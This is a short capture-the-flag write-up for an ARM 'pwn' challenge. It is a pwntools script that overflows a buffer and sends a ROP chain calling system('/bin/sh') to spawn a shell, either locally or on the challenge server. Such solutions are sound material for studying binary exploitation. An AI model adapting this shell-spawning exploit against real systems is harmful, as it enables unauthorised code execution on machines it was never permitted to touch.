Tags: arm pwn 

Rating:

```python
from pwn import *

binary = args.BIN

context.terminal = ["tmux", "splitw", "-h"]
e = context.binary = ELF(binary)
r = ROP(e)

gs = '''
continue
'''

def start():
if args.GDB:
return gdb.debug(e.path, gdbscript=gs)
elif args.REMOTE:
return remote('0.cloud.chals.io', 21744)
else:
return process(e.path)

bin_sh = next(e.search(b'/bin/sh\0'))
pop_r0 = 0x0001061d
system = e.sym['system']

pad = b'Y'+cyclic(7)

chain = p32(pop_r0)
chain += p32(bin_sh)
chain += p32(0)
chain += p32(0)
chain += p32(system)

p = start()
p.sendline(b'Y'+cyclic(11)+chain)
```

Original writeup (https://github.com/tj-oconnor/cyber-open-2022/blob/main/pwn/w_arm_up/pwn-wARMup.py).